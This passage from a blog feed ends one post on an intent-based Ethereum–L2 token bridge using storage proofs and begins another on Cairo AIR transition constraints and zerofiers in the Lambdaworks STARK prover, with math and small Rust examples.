&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. The user specifies a destination address on Ethereum and locks the tokens X to be bridged into an L2 escrow smart contract.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. A market maker monitors a change of state in the escrow smart contract.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. a. The market maker calls the transfer function of the PaymentRegistry contract in Ethereum.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       b. The transfer function of the PaymentRegistry contract in Ethereum pays the tokens X to the user.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. A storage proof is generated, containing evidence of a transfer from the market maker’s Ethereum account to the user-specified address in Ethereum.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. The PaymentRegistry storage information on Ethereum is used as part of a storage proof.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6. The L2 escrow contract verifies the storage proof of the PaymentRegistry contract in Ethereum and pays the market maker with the initial tokens locked by the user.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;2024&#x2F;01&#x2F;image.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;The same design can be extended to bridge tokens from one L2 to another. It can also use multi-proof storage proofs instead of relying on a single one. We have also implemented a fallback mechanism using the native messaging system between Ethereum and L2s in case the storage proof providers are offline.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Fallback mechanism&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
If the storage proof providers are not available, the market maker can prove to the Escrow contract that they fulfilled the user’s intent through the rollup’s native messaging system. Using this messaging system has the same trust assumptions as the L2s used in the transfer.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;risks&quot;&gt;Risks&lt;&#x2F;h2&gt;
&lt;p&gt;For the user, the risks include a bug in the code of the smart contract, a bug in the circuits of the ZK&#x2F;validity proof verification, and the possibility that the storage proof provider goes offline. The first risk is mitigated by keeping the smart contract very simple. The second risk is mitigated by using multi-proof storage proofs and multiple ZK&#x2F;validity proof implementations or TEEs. If the storage proof provider goes offline, the fallback mechanism can be used.&lt;&#x2F;p&gt;
&lt;p&gt;The risks for market makers are the same as for users, plus the risk of reorganization of the chain and the fact that the market maker receives the same tokens on the L2s rather than on Ethereum.&lt;&#x2F;p&gt;
&lt;p&gt;Since the capital is locked for a short period (until the proof is generated or the message arrives), the risks are minimized and the attack surface is smaller for the market maker.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;questions&quot;&gt;Questions&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;strong&gt;What are our disadvantages?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
The biggest disadvantage of this solution is that users can only bridge tokens that are present in both the origin and destination chains.&lt;br &#x2F;&gt;
Another disadvantage is that the risks don’t disappear; they are simply transferred to the market maker.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;How can users cancel their order?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
Initially, we are not going to offer the ability to cancel orders. The main reason is to avoid any timing attacks. For instance, a user could create an order and cancel it right after the market maker has paid them on the destination chain, thereby stealing funds from the market maker.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Is there any real-world implementation of this bridge?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
Yes. We have already implemented this between Starknet and Ethereum. We plan to integrate zkSync, Arbitrum, Optimism, Scroll, Base, and Linea next.&lt;br &#x2F;&gt;
All integrations require the same codebase with a few modifications, except for Starknet, which is not EVM compatible.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;How fast is it?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
From the user’s perspective, the bridging is completed in less than 30 seconds, as quickly as the time it takes the market maker to observe the user’s deposit and execute a transfer.&lt;br &#x2F;&gt;
From the market maker’s perspective, they will be able to withdraw the money after paying the user and generating the storage proof. This normally takes between 5 and 15 minutes. It’s important to also consider that the market maker will need to rebalance their liquidity using the native bridge and wait for the finality of the native bridge to rebalance their portfolio.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;How cheap is it?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
The cost of this bridge is similar to an ERC20 transfer plus the cost of proving the state of the L1 and L2. This second cost tends towards zero since it’s amortized by multiple calls that use the same proof, and the proving cost is minimal compared to on-chain transfers.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is new in this design? Didn’t storage proofs solve this problem already?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
Storage proofs alone don’t fundamentally change the design of a traditional bridge. They merely enable a safer coordination mechanism.&lt;br &#x2F;&gt;
Locking the user’s capital first provides guarantees to the market maker that they will receive the funds in exchange for fulfilling the user’s intent.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Couldn’t you solve this problem without Storage Proofs? What do they add to the table?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Yes, Storage Proofs are not strictly necessary to solve this problem. But they are a key technological component for a future-proof architecture. If we want this protocol to scale, storage proofs are the best way to do so, since they will allow us to prove many orders together.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What are the benefits against an Optimistic Oracle?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Optimistic Oracles were a great solution before Storage Proofs became feasible; their main disadvantages are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Optimistic Oracles rely on game theory to work, and it is difficult to bootstrap an ecosystem that makes them robust.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Codebases are complex&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The settlement period takes a few hours (depending on the solution) and ends up creating inefficiencies for the market makers.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;On the other hand, our protocol, with native messaging and storage proofs, takes no longer than 15 minutes (between Ethereum and an L2) to unlock the funds. The protocol codebase is no more than 500 lines of code, and the risks are easy for all the players to understand, and therefore easy to mitigate.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Did anybody do something similar beforehand?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
Hop Protocol was one of the first bridges to allow cross-chain swaps between rollups and Ethereum with an AMM-based design using multiple messaging systems (native and optimistic). The main issue lies in the capital inefficiency of an AMM model and the significant security risks of locking large amounts of capital in complex cross-chain communications.&lt;&#x2F;p&gt;
&lt;p&gt;Across was the first bridge to leverage intents for a faster bridge experience and lower capital costs per transaction. However, by using an Optimistic Oracle, it naturally has a challenge period that the market maker has to wait through to get its funds back. To mitigate some of the problems their settlement mechanism introduces, they offer financial products around their main bridge solution, such as Liquidity Pools that front the capital to the market makers.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What are our advantages?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
Our bet is that zero-knowledge proofs will continue to improve, becoming faster and safer, thus enhancing our solution and allowing us to offer better prices by lowering risks and shortening the repayment period.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Fast and cheap bridging experience for the user&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Short capital lock-up period for the market maker&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Low on-chain complexity. The smart contracts in total are not larger than 300 lines of code.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;next-steps&quot;&gt;Next steps&lt;&#x2F;h2&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Speeding up message passing with EigenLayer to allow cross-chain swap settlements between L2s. The protocol should have the option to send faster messages between rollups and Ethereum with similar trust assumptions of the native messaging system.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Introducing Partially Filled Orders, offering cheaper but slower transfers with batching.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Intent-based DeFi Pooling.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Unified wallet abstraction across multiple L2s.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;</description>
      </item>
      <item>
          <title>Deep dive into Cairo&#x27;s AIR and the changes we had to do in Lambdaworks to be compatible with Starknet Stone Prover</title>
          <pubDate>Thu, 25 Jan 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/deep-dive-into-cairos-air-and-the-changes-we-had-to-do-in-lambdaworks-to-be-compatible-with-starknet-stone-prover/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/deep-dive-into-cairos-air-and-the-changes-we-had-to-do-in-lambdaworks-to-be-compatible-with-starknet-stone-prover/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/deep-dive-into-cairos-air-and-the-changes-we-had-to-do-in-lambdaworks-to-be-compatible-with-starknet-stone-prover/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;During the last months, we have been working to make the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&quot;&gt;Lambdaworks&lt;&#x2F;a&gt; STARK Platinum prover compatible with Starknet’s Stone prover. We also want STARK Platinum to be flexible enough to be used as a drop-in replacement for other STARK provers, such as Winterfell (employed as the default prover in Miden). One of the main difficulties is related to how we provide the algebraic intermediate representation (AIR) and constraints in a simple yet expressive way while being able to try and test several trace configuration layouts. In a &lt;a href=&quot;&#x2F;comparing-stark-provers&#x2F;&quot;&gt;previous post&lt;&#x2F;a&gt;, we discussed different design choices for STARK provers, such as using virtual columns, built-ins, and chiplets, and their tradeoffs. We would like the prover to be as modular as possible so that we can try different design options, incorporate new tools or fields, and assess performance. One inconvenience with previous approaches was that changes in the AIR or selecting a new layout required extensive rewriting. Moreover, when using virtual columns, the prover must supply the zerofiers for each constraint, which depend on how the columns are interleaved, making the process difficult and error-prone.&lt;&#x2F;p&gt;
&lt;p&gt;In this post, we will cover the new way of implementing transition constraints and AIRs in STARK Platinum, which should give us more freedom to test and move things around, making it more straightforward to add new layouts. We also provide tools to evaluate the zerofiers without the user giving the exact expression. If you are unfamiliar with some of the concepts, you can take a look at our posts on STARKs &lt;a href=&quot;&#x2F;diving-deep-fri&#x2F;&quot;&gt;1&lt;&#x2F;a&gt; and &lt;a href=&quot;&#x2F;comparing-stark-provers&#x2F;&quot;&gt;2&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
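&lt;p&gt;As a small example of the zerofier bookkeeping involved, consider the standard transition zerofier: over a trace domain of size $n$ generated by $g$, a constraint that must hold on every row except the last has zerofier $Z(x) = (x^n - 1)&#x2F;(x - g^{n-1})$. The following toy check (parameters of our choosing, not lambdaworks code) confirms the closed form against the explicit product:&lt;&#x2F;p&gt;

```python
# Toy check that the closed-form transition zerofier matches the explicit
# product over the first n - 1 trace-domain points, in F_17 with n = 4.
P = 17
g, n = 4, 4          # g = 4 has multiplicative order 4 modulo 17
x = 5                # evaluation point outside the domain {1, 4, 16, 13}

# Closed form: Z(x) = (x^n - 1) / (x - g^(n-1)), with division done via
# Fermat inversion a^(P-2) mod P.
closed = (pow(x, n, P) - 1) * pow(x - pow(g, n - 1, P), P - 2, P) % P

# Explicit product over the rows where the constraint must hold.
product = 1
for k in range(n - 1):
    product = product * (x - pow(g, k, P)) % P

assert closed == product  # both equal 7 in this toy instance
```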
&lt;h2 id=&quot;transition-constraints&quot;&gt;Transition constraints&lt;&#x2F;h2&gt;
&lt;p&gt;We define the public trait &lt;code&gt;pub trait TransitionConstraint&amp;lt;F, E&amp;gt;: Send + Sync where F: IsSubFieldOf&amp;lt;E&amp;gt; + IsFFTField + Send + Sync, E: IsField + Send + Sync,&lt;&#x2F;code&gt;, which contains all the methods we need to deal with transition constraints. It is generic over two fields, &lt;code&gt;F&lt;&#x2F;code&gt;, the base field, and &lt;code&gt;E&lt;&#x2F;code&gt;, which could be a field extension of &lt;code&gt;F&lt;&#x2F;code&gt;. If we do not need an extension field, we will simply have &lt;code&gt;E&lt;&#x2F;code&gt; equal to &lt;code&gt;F&lt;&#x2F;code&gt;. The base field should also be an FFT-friendly field, that is, it should contain a multiplicative subgroup of size $2^m$ (for example, $p = 2^{64} - 2^{32} +1$ has a multiplicative group of size $2^{64} - 2^{32}$, which is divisible by $2^{32}$). Below, we list the main methods:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `fn degree` gives the degree of the transition constraint. All the constraints for the Cairo vm are at most degree 3. The higher the degree of the constraint, the larger the evaluation domain needed to calculate the transition constraints.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `fn constraint_idx` gives the constraint identifier, a unique integer between 0 and the total number of transition constraints.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `fn evaluate` specifies how to evaluate the constraint over the trace&amp;#39;s low-degree extension (LDE). Depending on the constraint, `periodic_values` or `rap_challenges` may be needed. The values are stored in the `transition_evaluations` vector, in the position corresponding to the `constraint_idx`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `fn period` indicates how often a constraint is applied. If the constraint is applied at each step, it is set to $1$. Some constraints may apply every several steps (for example, 16 or 256), which is necessary to evaluate the zerofier correctly.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `fn offset` indicates where we start applying the constraint, beginning from the first step. If the constraint applies from the first step, we set it to $0$. If a constraint starts at $1$ and has a period of $16$, this means that the constraint is valid for steps 1, 17, 33, 49, etc. We need this to evaluate the zerofier correctly.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `fn end_exemptions` indicates how many of the trace&amp;#39;s last steps are exempt from the constraint. If the constraint applies to every step, it is set to $0$. If the last two steps do not enforce the constraint, we set it to $2$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * `fn exemptions_period` and `fn periodic_exemptions_offset` are necessary to remove several intermediate steps from a constraint. All the exemptions are needed to evaluate the zerofier correctly.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Several methods to evaluate the zerofier for the constraint: `fn end_exemptions_poly`, `fn zerofier_evaluations_on_extended_domain`, and `fn evaluate_zerofier`. The second function is needed to evaluate the composition polynomial, while the third one is required to evaluate at the out-of-domain point, $z$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;understanding-exemptions-and-zerofiers&quot;&gt;Understanding exemptions and zerofiers&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;fibonacci-sequence&quot;&gt;Fibonacci sequence&lt;&#x2F;h3&gt;
&lt;p&gt;To see how exemptions work, let us look at some examples. The easiest to grasp is &lt;code&gt;end_exemptions&lt;&#x2F;code&gt;, which appears, for example, in the calculation of the Fibonacci sequence:&lt;br &#x2F;&gt;
$a_0 = a_1 = 1$&lt;br &#x2F;&gt;
$a_{n + 2} = a_{n + 1} + a_n$&lt;br &#x2F;&gt;
A single trace column can represent this and can be expressed by the following polynomial relationship:&lt;br &#x2F;&gt;
$t(g^2 x) - t(g x) - t(x) = 0$&lt;br &#x2F;&gt;
This constraint is valid for all computation steps except the last two. Remember that we represent each step by a power of $g$, an $n$-th primitive root of unity ($n$ is equal to the trace length). Thus, the zerofier would look like&lt;br &#x2F;&gt;
$$Z_C (x) = \prod_{i = 0}^{ n - 3} (x - g^i ) = \frac{\prod_{i = 0}^{ n - 1} (x - g^i )}{(x - g^{n - 2} )( x - g^{n - 1} )}$$&lt;br &#x2F;&gt;
Here, the vanishing polynomial over the whole domain is&lt;br &#x2F;&gt;
$Z (x) = \prod_{i = 0}^{ n - 1} (x - g^i ) = x^n - 1$&lt;br &#x2F;&gt;
while the exemptions polynomial is just&lt;br &#x2F;&gt;
$E (x) = (x - g^{n - 2} )( x - g^{n - 1} )$&lt;br &#x2F;&gt;
Dividing the first by the second gives the zerofier for the constraint. To represent this constraint, we have &lt;code&gt;fn end_exemptions&lt;&#x2F;code&gt; return $2$, &lt;code&gt;fn period&lt;&#x2F;code&gt; return $1$, and &lt;code&gt;fn offset&lt;&#x2F;code&gt; return $0$.&lt;&#x2F;p&gt;
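The equality between the product form and the quotient form of $Z_C$ is easy to check numerically. Below is a minimal sketch over the toy field $\mathbb{F}_{17}$, taking $n = 8$ and $g = 9$ (a primitive 8th root of unity modulo 17); the parameters and helper names are illustrative and are not part of lambdaworks.

```rust
// Sanity check for the Fibonacci zerofier: the explicit product over the
// first n - 2 steps equals (x^n - 1) / ((x - g^(n-2))(x - g^(n-1))).
// Toy parameters, not lambdaworks API: the field F_17, n = 8, g = 9.

const P: u64 = 17;

// Square-and-multiply modular exponentiation.
fn pow_mod(mut b: u64, mut e: u64) -> u64 {
    let mut r = 1;
    b %= P;
    while e > 0 {
        if e % 2 == 1 {
            r = r * b % P;
        }
        b = b * b % P;
        e >>= 1;
    }
    r
}

// Modular inverse via Fermat's little theorem (P is prime).
fn inv(a: u64) -> u64 {
    pow_mod(a, P - 2)
}

// Z_C(x) as the explicit product prod_{i = 0..n-3} (x - g^i).
fn zerofier_product(x: u64, g: u64, n: u64) -> u64 {
    (0..=n - 3).fold(1, |acc, i| acc * ((x + P - pow_mod(g, i)) % P) % P)
}

// Z_C(x) as the full vanishing polynomial divided by the two end exemptions.
fn zerofier_quotient(x: u64, g: u64, n: u64) -> u64 {
    let num = (pow_mod(x, n) + P - 1) % P;
    let e1 = (x + P - pow_mod(g, n - 2)) % P;
    let e2 = (x + P - pow_mod(g, n - 1)) % P;
    num * inv(e1 * e2 % P) % P
}

fn main() {
    let (g, n) = (9, 8);
    // Both forms agree at an arbitrary point of the field...
    assert_eq!(zerofier_product(5, g, n), zerofier_quotient(5, g, n));
    // ...and vanish on the constrained steps, e.g. the first one (x = g^0 = 1).
    assert_eq!(zerofier_product(1, g, n), 0);
    println!("zerofier forms agree");
}
```

The quotient form costs a couple of exponentiations and one inversion instead of $n - 2$ multiplications, which is one reason zerofiers are evaluated through vanishing polynomials rather than explicit products.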
&lt;h3 id=&quot;cairo-flags-example&quot;&gt;Cairo Flags example&lt;&#x2F;h3&gt;
&lt;p&gt;This example follows the constraints in the virtual column containing all the flags in the Cairo vm. The AIR is provided &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;blob&#x2F;87915f06dab3a899d6e967766c0097a89d8d633b&#x2F;provers&#x2F;stark&#x2F;src&#x2F;examples&#x2F;bit_flags.rs#L18&quot;&gt;here&lt;&#x2F;a&gt;. The column consists of repetitions of 15 binary values, followed by a zero value. There are two transition constraints:&lt;br &#x2F;&gt;
$t (1 - t) = 0$&lt;br &#x2F;&gt;
$t = 0$&lt;&#x2F;p&gt;
&lt;p&gt;The first constraint holds for all values except every 16th value. On the other hand, the second constraint holds only every 16 rows, starting from row 15. Let’s compute the zerofier for the second constraint first:&lt;br &#x2F;&gt;
$Z_C (x) = (x - g^{15} )(x - g^{31} )(x - g^{47} )…$&lt;br &#x2F;&gt;
The number of factors is $n&#x2F;16$. We can take $g^{15}$ as a common factor and set $y = x&#x2F;g^{15}$. Thus,&lt;br &#x2F;&gt;
$Z_C (x) = g^{15 n&#x2F;16} \prod_{j = 0}^{ n&#x2F;16 - 1} (y - g^{ 16j} )$&lt;br &#x2F;&gt;
Remember that, if $g$ is an $n$-th root of unity, $g^{16}$ is an $n&#x2F;16$-th root of unity. Since the product runs over all the $n&#x2F;16$-th roots of unity, we get&lt;br &#x2F;&gt;
$Z_C (y) = g^{15 n&#x2F;16} (y^{n&#x2F;16} - 1)$&lt;br &#x2F;&gt;
Distributing and remembering the relationship between $x$ and $y$&lt;br &#x2F;&gt;
$Z_C (x) = x^{n&#x2F;16} - g^{ 15n&#x2F;16 }$&lt;br &#x2F;&gt;
This zerofier is compatible with &lt;code&gt;fn offset&lt;&#x2F;code&gt; equal to $15$ and &lt;code&gt;fn period&lt;&#x2F;code&gt; equal to $16$, with no exemptions present.&lt;&#x2F;p&gt;
&lt;p&gt;The zerofier for the first constraint can be calculated from the vanishing polynomial for the whole trace and the zerofier for the zero-flag constraint. That is,&lt;br &#x2F;&gt;
$$Z_F (x) = \frac{x^n - 1}{x^{n&#x2F;16} - g^{ 15n&#x2F;16 }}$$&lt;&#x2F;p&gt;
&lt;p&gt;The first constraint has &lt;code&gt;fn periodic_exemptions_offset&lt;&#x2F;code&gt; equal to $15$ and &lt;code&gt;fn exemptions_period&lt;&#x2F;code&gt; equal to $16$, which essentially computes the same zerofier as the zero-flag constraint and divides the full-trace vanishing polynomial by it.&lt;&#x2F;p&gt;
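The closed form $Z_C(x) = x^{n&#x2F;16} - g^{15n&#x2F;16}$ can also be checked against the explicit product over rows $15, 31, 47, \ldots$ The sketch below uses the toy field $\mathbb{F}_{257}$ with $n = 32$ and $g = 136$ (a primitive 32nd root of unity modulo 257, so the product has only $n&#x2F;16 = 2$ factors); these parameters are for illustration only and are unrelated to lambdaworks.

```rust
// Checking Z_C(x) = x^(n/16) - g^(15n/16) against the explicit product
// over rows 15, 31, 47, ... where the zero-flag constraint applies.
// Toy parameters for illustration only: the field F_257, n = 32, g = 136.

const P: u64 = 257;

// Square-and-multiply modular exponentiation.
fn pow_mod(mut b: u64, mut e: u64) -> u64 {
    let mut r = 1;
    b %= P;
    while e > 0 {
        if e % 2 == 1 {
            r = r * b % P;
        }
        b = b * b % P;
        e >>= 1;
    }
    r
}

// Closed form derived in the text: x^(n/16) - g^(15n/16).
fn zerofier_closed_form(x: u64, g: u64, n: u64) -> u64 {
    (pow_mod(x, n / 16) + P - pow_mod(g, 15 * n / 16)) % P
}

// Explicit product over the exempted rows: prod_j (x - g^(15 + 16j)).
fn zerofier_explicit(x: u64, g: u64, n: u64) -> u64 {
    (0..n / 16).fold(1, |acc, j| acc * ((x + P - pow_mod(g, 15 + 16 * j)) % P) % P)
}

fn main() {
    let (g, n) = (136, 32);
    for x in [1, 7, 100, 200] {
        assert_eq!(zerofier_closed_form(x, g, n), zerofier_explicit(x, g, n));
    }
    // The zerofier vanishes exactly on the rows where the flag must be zero.
    assert_eq!(zerofier_closed_form(pow_mod(g, 15), g, n), 0);
    println!("closed form matches the product");
}
```

With realistic trace lengths the product has $n&#x2F;16$ factors, so evaluating the closed form is significantly cheaper.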
&lt;h2 id=&quot;algebraic-intermediate-representation&quot;&gt;Algebraic Intermediate Representation&lt;&#x2F;h2&gt;
&lt;p&gt;We established an AIR trait, which contains all the methods we need to represent the trace, the constraints, and their evaluation.&lt;&#x2F;p&gt;
&lt;p&gt;The method &lt;code&gt;fn trace_layout(&amp;amp;self) -&amp;gt; (usize, usize)&lt;&#x2F;code&gt; provides the number of columns of the main and auxiliary traces (if it exists). The main trace contains elements in the base field (for example, Stark252 or Mini-Goldilocks). In contrast, if needed, the auxiliary trace may have elements from an extension field to achieve cryptographic security.&lt;&#x2F;p&gt;
&lt;p&gt;To evaluate transition constraints, we have the methods &lt;code&gt;fn compute_transition_prover&lt;&#x2F;code&gt;, &lt;code&gt;fn compute_transition_verifier&lt;&#x2F;code&gt;, &lt;code&gt;fn transition_constraints&lt;&#x2F;code&gt; and &lt;code&gt;fn transition_zerofier_evaluations&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;The method &lt;code&gt;fn transition_zerofier_evaluations&lt;&#x2F;code&gt; has a default implementation. Given that some constraints might share the same zerofier (because they apply at the same steps of the execution trace), we avoid recomputing zerofiers by grouping constraints under a &lt;code&gt;zerofier_group_key&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn transition_zerofier_evaluations(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &amp;amp;self,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        domain: &amp;amp;Domain&amp;lt;Self::Field&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ) -&amp;gt; Vec&amp;lt;Vec&amp;lt;FieldElement&amp;lt;Self::Field&amp;gt;&amp;gt;&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let mut evals = vec![Vec::new(); self.num_transition_constraints()];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let mut zerofier_groups: HashMap&amp;lt;ZerofierGroupKey, Vec&amp;lt;FieldElement&amp;lt;Self::Field&amp;gt;&amp;gt;&amp;gt; =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            HashMap::new();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        self.transition_constraints().iter().for_each(|c| {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let period = c.period();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let offset = c.offset();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let exemptions_period = c.exemptions_period();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let periodic_exemptions_offset = c.periodic_exemptions_offset();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let end_exemptions = c.end_exemptions();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; This hashmap is used to avoid recomputing with an fft the same zerofier evaluation&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; If there are multiple domains and subdomains they can be further optimized&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; as to share computation between them&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let zerofier_group_key = (&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
